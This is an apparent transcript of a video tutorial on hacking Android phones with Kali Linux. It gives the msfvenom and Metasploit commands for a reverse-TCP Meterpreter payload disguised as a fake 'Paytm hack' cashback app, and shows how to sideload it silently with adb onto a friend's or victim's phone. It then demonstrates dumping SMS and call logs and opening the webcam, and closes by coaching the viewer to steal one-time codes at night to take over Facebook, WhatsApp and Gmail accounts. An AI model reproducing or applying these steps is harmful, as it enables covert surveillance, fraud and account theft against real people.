Hey everyone, welcome to this video, and in this video we are going to learn mobile hacking. Okay, so basically in this video we are going to hack into an Android phone. Yes, okay, so let's get started. Alright, so with the help of Kali Linux we can create a rat. We can create our custom rat tool, okay, that is a remote administration tool. So like the one which we have seen for Windows operating system in the earlier session. Alright, so we can create our own custom rat with the help of Kali Linux. Okay, we usually say it as payload. Okay, we usually say it as payload in Kali Linux when we create such malicious rat or malicious software. Okay, we usually call it as a payload. So we can create such payloads with the help of MSF Venom in Kali Linux. It's of course it's commonly known as also known as Android malware. Okay, so like the thing which we are going to create is Android malware basically, because once it's installed in your Android phone or somebody or somebody's phone, an attacker or a hacker can read call logs, read SMSs, can send SMS on behalf of you to someone else, can check out your geographic location, can see you from your webcam. Yes, this is everything is possible. Okay, so we'll of course have a demonstration after this, but this is what Android phone hacking is and the power of Android phone hacking. Okay, now these are some steps how to create an Android rat. So with the help of Kali Linux we can create an Android rat. So first of all, in Kali Linux we have to type this command, so MSF Venom. Now MSF Venom is the new word, okay, new keyword to create a payload. Earlier in Metasploit we used to write MSF payload to create a payload, but now it has been replaced with MSF Venom, and -p is for payload. So what type of payload do you want to create? Then Android slash meterpreter slash reverse underscore TCP, that's the payload that we are going to create. Meterpreter is an advanced shell. Meterpreter is an advanced shell. So consider it's kind of an advanced command prompt. Okay, so meterpreter command prompt will have a very short word, so that like if you don't remember the command prompt commands, it's okay. Okay, you can just remember meterpreter commands because they are very simple to use. And that's why if you don't want to if you don't want to have a normal shell, okay, like you can see in Windows you can get command prompt, in Linux you can get terminal. So if you are hacking into somebody's Windows, or if you're hacking into somebody's Linux, you get reverse shell. Now when I say reverse shell, it means that access to their command prompt or access to the terminal of Linux. If you don't want to use if you don't want access to command prompt or terminal in Linux, okay, you can always use meterpreter, because meterpreter is an advanced command prompt, or you can say advanced shell. And you don't need to you don't need to mug up Linux commands, you don't need to mug up Windows commands, okay, if you know meterpreter commands. So that's the importance of meterpreter, and most of the hackers do use meterpreter. And then reverse underscore TCP, so basically this is to get the reverse connection from the mobile phone to our system, to hacker system. Okay, so if I insert that particular payload into your phone, then I will get reverse connection to my system. So that's why this payload we are going to use. Lhost. Lhost is localhost. So basically our IP address, my Kali Linux IP address, okay, or my server's IP address from where from where I want the reverse connection. And L port, okay, so my local port, basically whichever port I can keep. Okay, whichever port is free on my system I can keep it over here. So basically people uses like 4444, and then we are going to output this particular application. So I have named it as Paytm hack. So nowadays, like, there are a lot of Paytm frauds going on, right? So if you say to your friend that, hey, this is a Paytm hack application which I have created, if you install this, then you will get some extra cashback in your wallet. Okay, believe me, half of the people, okay, without looking at anything, they will install it and they will fall into your trap. So that's basically social engineering. uh, yes, so that's basically your creativity, how you can lure people, uh, how you can fool people, okay, and they fall into your trap. So of course I always tell hackers should be creative. And then set up a listener using Metasploit framework. So once the application is installed into your friend, and once once the application is giving us reverse connection, okay, then of course we should have some kind of a listener into our own system who continuously listens to that particular reverse connection. Okay, so of course any connection is two-way connection. If we are getting a connection but we are not listening to it, then there is no point. So we have to uh, put up a listener onto our own system, and that's why we can use these commands to set up a listener. So for listener you can use this exploit multi-handler, and then you have to put this payload, set payload android. Again, payload is the same, android meterpreter reverse TCP, your local host and your local port on which you want to listen, and finally you need to type exploit. Okay, so we are going to do the same thing. Let's go and let's check this out. So I have my Kali Linux set up over here. All right, excuse me. And I have my mobile phone over here. Okay, so I have this Jenny Motion. I'm using Jenny Motion, which is kind of a virtual device. I mean, it's kind of a virtual device for setting up your virtual Android phones and multiple type of Android phones. Okay, so this is kind of an emulator. Yes, I have set up this phone. It's Google Nexus 5, and I have connected my Genymotion in a bridged mode. Now when I say again bridged mode, it means that it will like the IP address, okay, will be in the same range of as of my the base operating system. So my base operating system's IP address is, let's go and check this out, IP config, it's 192.168.0.25, right? And if you go and check this IP address of this particular, I can say, Android phone, the IP address of this phone is falling in the same range due to bridged mode. Only then we can connect these things, okay, in the same range, 192.168.0.94. Cancel, go to home. Alright, and my Kali Linux is also connected onto a bridged mode, so all of them are on the same network, and that's why all of them can communicate. So what I'm doing here is, let me quickly open up this. You might not see me because I'm in my virtual machine, but of course you can hear me and you can see what I'm doing in the Kali Linux. So I'm opening terminal. The first thing, okay, creating a payload. So msf venom -p slash, I mean android slash meterpreter slash reverse underscore tcp lhost 192.168.0. I mean, let's check what's the IP address of my Kali Linux. So I'll go if config. In Linux the command is if config, okay. In Windows command is ip config. Always remember this. In Linux and Mac command is if config. And also understand that Android is based on the Linux system, okay. Android is based on the Linux system, so IP address of my Kali Linux is 0.18. So I'll quickly close this. 0.18. L port which we need to set is 4444. Then R for output. Then we are going to output this on root and ptm hack.apk. So this will generate the payload for us. Alright, so in just few seconds it will generate a payload for us. And if you can see this update.apk, magic game.apk, these are also the same, like apk is generated to the same payloads, okay. But I'm generating a fresh payload in front of you. So let's wait for next few minutes. It should be done. Alright, okay, no platform was selected. MSF platform Android from payload. The following options failed to validate lhost and lport, okay. Lhost, lport, okay. Let's do this. Is equals to, and lport is equals to So we are waiting for the payload to get generated. Okay, now it's generated. Okay, payload size is 10086 bytes. So now it's generated under root. So we'll have this. Now what I'm doing here is I'm directly connecting my Android phone. I have the IP address of my Android phone, which is this. So with the help of ADB connect. Okay, ADB is Android debugging bridge. So if you want to connect your Android phone with your Kali Linux or with your Windows, you should have Android debugging bridge in your system. So by default, ADB is available in Kali Linux. So I'm doing ADB connect and I'm connecting to my phone. This is optional. Okay, this is optional because in real time you have to install your. I mean, you have to install this particular application in your friend's system. Okay, maybe physically, maybe you have access to your friend's phone for a few minutes. Like you can say, hey, my battery is low, can you please give me a call, give me a phone to make a quick call. Or maybe if you are in the same network, okay, maybe you all in the library network, you all are in the library network, you and your friend, your all of your victim. Okay, then you can quickly do this. Okay, with the help of ADB connect, you can connect to your friend's phone because your friend is in the same network. So look at this ADB connect, and this IP address is of Android phone, and this is connected. Now you can install the application silently in your friend's phone or your victim's phone with the help of ADB install. So ADB install /root /paytm hack.apk, and you can see it has been successfully installed. It has been successfully installed. Okay, now we are going to open up MSF console and set up a listener. We are going to open up this and set up a listener. Excuse me. Okay, till the time this MSF console is working, let's go and check the Android phone whether our Paytm hack application has been installed into that machine or not. So I'll quickly go here and I'll just look at this. Alright, so I'll just look into this. Is it on the home screen somewhere? Or we can just drag and drop. Okay, we can just do drag and drop and it will be installed, and it will also open up. So no problem, we'll keep it here. Okay, so this MSF is now opened up. So let's go and set up the listener. So the command to set up the listener is use. See, ultimately we are using an exploit which is called as multi-handler to like mostly we use multi-handler to listen. Okay, I'm not still getting this cursor over here. I'm just waiting to get the cursor. Okay, can we type in over here? Nope. Alright, we have got the cursor. Use exploit /multi /handler, and then we are going to set the payload. Set payload android /meterpreter /reverse underscore TCP. Then we are going to again set this lhost 192.168.0.18, which is our Kali Linux lhost, I mean IP address, and set lport is equals to like 4444, and lport is also set. And finally we are pressing exploit button, I mean exploit command. So we have started the handler and it's listening on it's listening basically. Okay, as you can see, the reverse handler has been started. Now the thing which we have to do is we have to interact with the application which has been installed in the machine. So the other workaround, okay, if we cannot find the application installed with the help of adb install command, the other workaround is go to this home folder, go to this other locations in this PC. Inside of root folder we will have this ptmhack.apk. so in other locations we will quickly see root folder over here. Okay, computer root, where is root? Yeah, here is. And okay, the same thing, here is the ptmhack.apk. And let me quickly do drag and drop if it's working across devices. Okay, this one. Can I do this? No, I cannot drag and drop outside of this VM. Let's open up this activity if it's working. I think this activity is the ptm hack and the name is main activity. Let's see whether we have received the connection or not. Yes, so as you can see, when we clicked on main activity, okay, in the Android phone, okay, this is the application which we have recently installed. So we have got a meterpreter shell over here, and now what we can do is dump underscore call logs. Dump underscore call log. Okay, no call log entries because this is a virtual machine. Dump underscore SMS if okay, no SMSs again. So webcam underscore snap unknown command. Okay, web underscore snap. Oops, let me just go here. We have the commands listed over here. Okay, webcam snap, maybe we can type in webcam underscore stream if that's working. So I'll just go back, not here in the Kali Linux machine, webcam underscore stream. So stream is a video, okay, stream is a video. So copy this. Okay, webcam underscore get frame operation failed. So maybe due to the virtual machine, okay, maybe due to the virtual machine, but this has opened, webcam stream has opened over here, and it was trying to play, but due to the virtual machine we could not get anything streamed over here. Okay, see, but in the real device if you try this, it would surely work. In the real device, if you try this, you can see your friend or your victim through his camera or through her camera. Okay, this is the power of meterpreter. And you can also send SMS on behalf of your victim. If you want to check the commands of meterpreter, you can just go to this help, and these are all the commands that you can trigger. On the devices. See, geolocation can be fetched. Okay, you can check whether the phone is rooted or not. So let's go and check underscore root. So the device is rooted because all the devices in Genymotion are by default rooted. Okay, and all these are different commands that you can trigger. Alright, so thanks for watching this video. Once again, I'll just walk you through the slides. Let's go back to the slides. Okay, these are the commands, and yes, we are done. Alright, so one more thing. See, if you can read out your friend's SMSs, then think of the possibility that, let's say, if you know your friend's phone number, okay, and you know that your friend is using a Facebook account with his phone number, okay, you are sure that your friend is having a Facebook account, and he must have entered his official number or the main number for resetting the password. So if you go to Facebook reset password page, and if you enter your friend's profile, your friend will get an OTP. Okay, understand, if you go to Facebook password reset, okay, then you enter your friend's profile or your friend's email address or your friend's mobile number, a profile will come up. Facebook will say, do you want to reset the password of this particular account? Okay, go further, and then Facebook will send an OTP to your friend, not to you, to your friend. Then the SMS will be sent to your friend's number. Okay, but if you have this malware installed, you can dump that OTP, you can dump that SMS, okay, and immediately you will also get the same OTP, I mean same SMS in your machine, in your Kali Linux or whatever system you have, okay, or wherever you are listening from. So it will give you your friend's OTP to reset his Facebook account, reset the password of his Facebook account, and that's how you can take over your friend's Facebook. Also, you can do the same thing to hack into your friend's WhatsApp. Understand? Like you ask for a reset code, or you ask for a what I can say, change phone number, or I'm not sure about WhatsApp, okay, but if you want to take over a WhatsApp, you can also go to change, like reset my WhatsApp or change phone number. If you do this, it will send an OTP to your friend's number, official number, okay, and then you can dump the SMS, and you can change the number, so you can take over your friend's WhatsApp account as well. Likewise, you can take over your friend's LinkedIn account, you can take over your friend's Twitter account, whatsoever account he is working upon, because all the OTP are going to his number first. Then you are placing dump underscore SMS, and then you are fetching all the SMS from your friend's phone to your server, and that's how you can read the OTP as well. So do this trick when your friend is sleeping at night, and you can take his account over, like while he is sleeping, okay, because while sleeping he cannot understand like what OTP, why I'm getting this OTP, okay, and then you fetch the OTP, and then you reset the password. So that's how you can hack into your friend's Facebook account, WhatsApp, LinkedIn, Twitter, Gmail, whatsoever. Alright, so thanks for watching this video, and see you in the next video.